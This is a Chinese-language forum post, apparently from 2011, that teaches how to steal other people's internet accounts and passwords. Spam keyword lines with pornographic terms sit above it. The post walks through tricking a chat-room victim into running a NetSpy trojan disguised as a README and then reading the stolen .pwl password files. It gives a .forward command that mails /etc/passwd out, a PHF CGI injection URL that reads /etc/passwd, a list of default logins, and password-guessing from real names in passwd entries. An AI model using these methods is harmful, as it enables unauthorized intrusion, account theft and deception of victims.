久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      • <sub id="9pxky"></sub>
    2. 

      <small id="9pxky"></small>
        

          

          汶上信息港
          
標(biāo)題: 如何得到別人的上網(wǎng)帳號(hào)和密碼 [打印本頁]
          

          
作者: 雜七雜八    時(shí)間: 2011-1-12 21:03
          
標(biāo)題: 如何得到別人的上網(wǎng)帳號(hào)和密碼
          如何得到別人的上網(wǎng)帳號(hào)和密碼,我在這里介紹幾種弱智方法。
          
2 S9 V, M! v" N+ L* b7 U: k! F" m+ N方案一:利用特洛伊木馬得到帳號(hào)。必備工具:NTESPY、PWLVIEW。/ h) m9 S- _0 h9 w( S, R7 L/ _! z
          
優(yōu)點(diǎn):只要對(duì)方運(yùn)行了程序就有80%的成功率,而且不需要任何網(wǎng)絡(luò)入侵知識(shí),只要能熟悉的操作上面兩個(gè)軟件即可。NETSPY是全中文軟件,一看就會(huì)。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡單而且用不了多長時(shí)間是它最大的優(yōu)點(diǎn),只是......" I* B+ f4 U, k4 i$ D
          
缺點(diǎn):只有一個(gè),那就是如何讓對(duì)方乖乖的運(yùn)行你的程序。) ~% j# g) h( y% E
          
提示:先問清你的目標(biāo)和你是不是在一個(gè)城市。
          
1 e2 `9 H* M3 u+ |- i2 W: j實(shí)戰(zhàn)演戲:一天,我在X海聊天室里尋找目標(biāo),遇見了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說:你好呀。我又說:XXXXXXX(客套話,先和他拉關(guān)系)對(duì)了,我拿到了一個(gè)新程序,要不要看看?丟丟說:好呀,寄給我吧。
          
! B, R& C7 `' c5 y; {2 f哈哈,魚上鉤了!先把誘餌程序改個(gè)名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過去,然后你讓他先運(yùn)行README。在這插一句,有一位大俠使用此法時(shí),竟然把控制端程序和NETSPY的說明文件一起發(fā)了過去,真搞不懂他怎么想的。我對(duì)他說,你先運(yùn)行README,是中文說明。丟丟說:好...咦,怎么沒反映呀?(YEAH!)我又說:那你直接運(yùn)行軟件吧。丟丟說:好吧...不錯(cuò)...我說:明天見...開始干活,連上他的機(jī)子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進(jìn)入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過來,放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號(hào)和密碼就都顯示出來了。而且以后如果他上網(wǎng),NETSPY就會(huì)通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。9 P, f( U0 ~; l
          
忠告:你用他的帳號(hào)上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時(shí)間。分析一下他一般幾點(diǎn)上網(wǎng)以避免撞車。2 r$ E# T/ E0 Y, j' G8 }
          
方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡(luò)刺客
          
3 w8 S" G/ }2 w7 K2 ?- B9 b優(yōu)點(diǎn):沒什么優(yōu)點(diǎn)
          
7 g( n  E' e0 l. T: i0 i& R缺點(diǎn):要具體情況具體對(duì)待,太麻煩( H' p1 q& t' x) [4 _
          
提示:平時(shí)多多留神。" g! ~8 w9 u) D4 i$ S, A. n+ \
          
譬如,某個(gè)ISP給你開好了帳號(hào),然后又畫蛇添足的給你一個(gè)郵箱,地址是:你的帳號(hào)@xxx.net
          
# W" g, P$ H1 ~- _& {密碼和你的上網(wǎng)密碼一樣。也就是說,只要你能敲開郵箱的密碼就一切OK了。; k9 o! U- l, y7 ?  n: ?3 D4 n
          
運(yùn)行EMAILCRK或網(wǎng)絡(luò)刺客,套上字典后就等著。一般沒有XX個(gè)小時(shí)搞不定,不成功的可能性很大,而且破解時(shí)還必須要上網(wǎng)。你的機(jī)子要是快可以開上三四個(gè)窗口,套上不同的字典一起破
          
- C% i4 r! m2 Q9 P! p方案三:侵入郵局主機(jī)然后把PASS檔抓回來,然后用JOHN或JACK套上字典開始破。
          
0 {# ]) ?0 o2 V- F/ V5 y優(yōu)點(diǎn):一次可以破出好多帳號(hào),而且如果運(yùn)氣好還能拿到ROOT,這個(gè)主機(jī)就要?dú)w你控制了。而且破解時(shí)不用上網(wǎng),可以好幾臺(tái)機(jī)子一起破。5 t/ e8 h' L# b0 S1 Q& ]
          
缺點(diǎn):對(duì)于初學(xué)者有一定困難,尤其是只想拿一個(gè)上網(wǎng)帳號(hào)這樣做恐怕會(huì)得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴(yán)重且性質(zhì)惡劣,一定要慎重對(duì)待。
          
2 T' @$ F+ Y9 o6 Y; o2 {3 N由于介紹此類的教學(xué)文章比較多,我就不班門弄斧了。 
          
) C7 l6 U8 l7 `) Q' A. A7 z+ N/ U4 u1 L3 }- r8 K  A
          
哈哈,我來說說最簡單的入侵方法。其實(shí)入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來做文章。
          
  J2 }' G( G& a1 K只不過有的網(wǎng)站漏洞難找有的好找而已。一個(gè)好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個(gè)小栗子。4 G: o2 f+ }% U# H
          
有一天,我去XX熱線申請(qǐng)主頁,發(fā)現(xiàn)那里采用的是機(jī)器自動(dòng)回信,信的大概格式如下:3 s1 C7 y# I( C+ o8 B1 N
          

          
0 S9 O' G3 F5 n' n0 @. O1 }------------------------------
          
1 X5 o: X! ]; H1 v  D# d4 \% b0 _) z8 G: A
          
XXX,你好(XX是你在表格上填的名字)
          
9 P7 M4 C2 N5 v$ c+ O! R! S& J你在XX熱線的主頁空間已開通* M$ M5 C+ O! F! x3 U1 i  ]
          
帳戶名:XXX 密碼:11
          
4 D# R6 F+ d, J1 a4 O-----------XX熱線( e1 m& ?5 F2 \/ T/ R9 h/ u) G
          
電話:XXXX-XXXXXXXX+ K' @1 `& E$ E2 ^2 R7 _# {* s
          
------------------------------9 B5 B/ J# a7 ]* i( ^1 l
          

          
. C1 r6 N2 a2 p4 B0 h5 v好了,由于是機(jī)器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機(jī)去改,有許多網(wǎng)友并沒有接觸過如何T主機(jī),所以他們使用的還是初始密碼11。+ G) O, V; Y+ @
          
開始干活了,打開FTP軟件,輸入XX熱線的IP,密碼11,然后挨個(gè)輸入帳戶名。帳戶名可去XX熱線的主頁空間列表里查看,先試試AAAA,。。。沒成功,再換一個(gè),AABB。。。還是不行。哈哈,這個(gè)用戶名短,沒準(zhǔn)能行。輸入AA。。。進(jìn)去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來沒改密碼的人很多呀。試幾個(gè)就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。9 C% m; x% \' |9 A. v
          
上面的這個(gè)栗子很簡單,一般象這么大的漏很難找。要侵入一個(gè)稍微象點(diǎn)話的站臺(tái)就要耗費(fèi)你大量的時(shí)間和金錢,而且還未必能成功。即使成功了,你不改它實(shí)在無趣,改了恐怕會(huì)步馬X的后塵。此人侵入貴陽的主機(jī)并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務(wù)上去。實(shí)在不行就去聊天室,看誰不聽話就炸他,同樣很過癮的!
          
7 S+ _) l9 A/ g0 G( j5 C1 V, O  
          
7 E3 n6 Y5 v" W6 y9 Z
          
! P" `" v1 D( Y, |  T8 f. f4 d                           如何獲得第一個(gè)帳號(hào)
          
3 P7 W) v, {# v, V/ I. \( \
          
" a$ Z+ w3 F/ m* {' E% G, x我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個(gè)有效帳號(hào),進(jìn)入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點(diǎn)找到對(duì)應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺最困難的是獲得第一個(gè)有效的帳號(hào),有時(shí)侯費(fèi)盡力氣也得不到,后來總算是積累了一些經(jīng)驗(yàn),想寫出來和大家交流一下,希望能拋磚引玉,請(qǐng)高手們把更好的方法告訴我., B4 H1 _7 S/ l0 V  p# W- |8 R
          

          
+ A. Q. A& ?2 G! S8 s+ Q確定了目標(biāo)以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開匿名FTP,帳號(hào)用ANONYMOUS或是FTP,密碼用一個(gè)EMAIL帳號(hào)(當(dāng)然是假的),進(jìn)入后到/etc目錄下把PASSWD拿回來,一般情況下都是一份很不全的名單,只有幾個(gè)系統(tǒng)帳號(hào),那就算白來了:-}但有的時(shí)候會(huì)有比較傻的管理員把一些普通帳號(hào)放進(jìn)去,這就是很重要的信息,雖然只有帳號(hào)沒有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個(gè).foward文件傳上去,在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后給匿名用戶寫一封信,它會(huì)把PASSWD發(fā)給你。
          
0 ~: x: P" x/ L2 P0 @% F, R( t+ Q0 }$ a/ B' q9 i; y$ I& b# z
          
如果目標(biāo)沒有匿名FTP,就通過WWW訪問它的主頁,看看上面有什么信息,例如通過一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號(hào),有的網(wǎng)頁上甚至列出了EMAIL通訊錄,這對(duì)黑客來講就是無價(jià)之寶.把這些帳號(hào)記下來,非常有用." R5 i; ^: T1 ?7 ?8 c* \
          

          
* Y/ I/ A7 W# `( T4 n! o以上幾個(gè)方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標(biāo)/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會(huì)顯示出PASSWD來,但是成功率極低:-< ! {9 _7 Y* F9 V  x
          
3 Z9 `" \, e( y; U1 V0 G
          
還可以利用目標(biāo)的FINGER功能來積累帳號(hào),如利用HAKTEK(一種掃描器)來監(jiān)視目標(biāo),一旦有人登陸該主機(jī)就會(huì)報(bào)告給你.但這種方法的缺點(diǎn)就是浪費(fèi)時(shí)間,如果你是自己花錢上網(wǎng)的話可就要出血了!
          
8 i7 b2 I. |( r1 u. h* N# g* |' V
          
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認(rèn)的帳號(hào),例如:) G2 ^) Y, V; C* H
          
" J9 `3 V/ _& q, A
          
帳號(hào)     密碼
          
  Q2 O+ b0 p$ G7 @! b- n. z( g----------- ----------------
          
# l7 X, m( `3 ], {" Zroot    root! ?  _* Z- ^8 A- [0 ?$ m3 c# `
          
sys     sys/system/bin
          
$ N; F: }; f! I( p& bbin     sys/bin) s6 N  s% J8 ?  A/ w
          
mountfsys  mountfsys4 f: M) |- g5 W* j& k& R7 k
          
adm     adm
          
+ |' j$ d/ {% M4 x1 O8 ?7 m  Xuucp    uucp8 W) A9 j2 u  m/ a0 w3 }7 Q0 E
          
nuucp    anon( o- o& j# @9 L$ F+ c3 K
          
anon    anon5 A! U3 V0 o7 m* k" i
          
user    user! k0 f4 c. t" h
          
games    games
          
9 g& g) E# h0 Y/ j, q9 e, S" Finstall   install* C- r2 F6 u2 E- `4 }' {) {
          
reboot   給 "command login" 用的
          
6 I5 O! {1 c! N2 N6 Sdemo    demo$ q  N6 i' v! p6 O/ R. Y
          
umountfsys umountfsys% K- w0 R! q# P8 @: J
          
sync     sync1 f' U5 y2 a0 S; G
          
admin    admin# }4 I* v8 j- g2 t
          
guest    guest
          
3 O% H) _1 L# Q7 O% ]daemon   daemon
          
0 v9 c; t) y+ X/ M  h________________________________________________________________
          
: y7 \2 c/ [) S
          
, z8 K& X: M7 H- H有些管理員忘記把他們改掉,那你就發(fā)財(cái)了!
          
( v9 z& f3 w7 P+ O; {
          
- o( T$ ]( k4 D9 K; m, X; |/ i另外還有一些習(xí)慣性帳號(hào)如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.
          
( W" [) P0 K5 w; u9 o
          
3 Z  m9 }2 j' l/ }0 H2 B只有帳號(hào)還不能進(jìn)入系統(tǒng),但有了帳號(hào)搞密碼就容易一些了,主要辦法還是猜.如果是通過PASSWD知道帳號(hào)的那你應(yīng)該會(huì)發(fā)現(xiàn)該用戶的許多信息,例如:
          
- U+ T2 H6 q/ _  o# i" u5 ?: v8 k2 [! z% K. J4 f
          
.........* U  a# D( u& C9 a- g3 l: T! Q
          

          
. g/ Q( ?8 `0 Z4 o3 Mxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
          
# N1 V2 {) ]4 Q! Y& C4 M+ T. W5 e  H. Q4 E/ G- ~) v
          
qingyuan:x:275:50::/usr/qingyuan:/bin/sh
          
" N4 K0 e' G  Y' J+ d4 q+ W
          
9 f- @' A! S1 e5 h2 a$ ghjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
          
6 W# I0 k( k. L1 q' J+ S/ s& U8 Y& ], ]. d+ X
          
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
          
$ H2 f! {0 d& z- Q& ^& p! f1 \. t  t. R
          
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
          
- h% Y3 v) L% f$ ]
          
4 A: k: q6 @% @brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
          
; D- b- v% O* j$ u- F
          
% I3 ~3 \+ a. ~: A5 h4 i( ~+ q8 vtide:x:301:50:Wang XinYi:/usr/tide:/bin/sh; Z$ B* o9 r$ y' }
          

          
% J0 C( T: ?& P3 P. H, R# X............! L* D/ n; g9 _% t
          

          
& S; }' C" w+ V5 ?! m- G3 X% o/ L8 y9 G這是一部分PASSWD,從這兒我們可以得到七個(gè)帳號(hào),注意每一行的第五項(xiàng),那是該用戶的真實(shí)姓名,對(duì)!就用它來做密碼試.成功率還是比較高的.. h, L3 K* c* L0 K- L' @
          
% \/ e- Y: ^4 ^7 j
          
如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來偵察support@xxx.xxx.xxx會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來猜">如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來偵察support@xxx.xxx.xxx會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來猜.( G6 H2 U) s* y& c$ r
          

          
9 t4 a* r* f" d2 n當(dāng)然最可能的密碼還是帳號(hào)本身和一些帳號(hào)的變形,如帳號(hào)是john,密碼可能是nhoj,john123,john888等.或是一些簡單數(shù)字.總之是要費(fèi)一番工夫來猜的.3 H/ n: Z& N# L" `
          

          
% x9 C* _; u/ |; [如果還猜不出密碼,只好用LETMEIN之類的東西來猜,字典一定要好.否則,你的電話費(fèi)就要.....而且這種方法比較危險(xiǎn),還是不用為好.
          
5 ~# i& p6 |& Z3 u( c/ E( q! w8 E8 e% a" T9 k& Q
          
最后實(shí)在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說了.& O: N6 J3 p5 U  i+ J3 ]
          

          
# Y9 z9 H+ M! m' b& b* b, v2 O你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說成功率是比較低的,因?yàn)槲乙膊恢栏玫姆椒?但我感到一定有一種更好的方法,希望有高手見到此文能告訴我.3 A6 M$ N/ e' U% b2 y
          

          
$ e3 t4 K. p% _




          

          

          歡迎光臨 汶上信息港 (http://www.junkejituan.com/)

Powered by Discuz! X3.5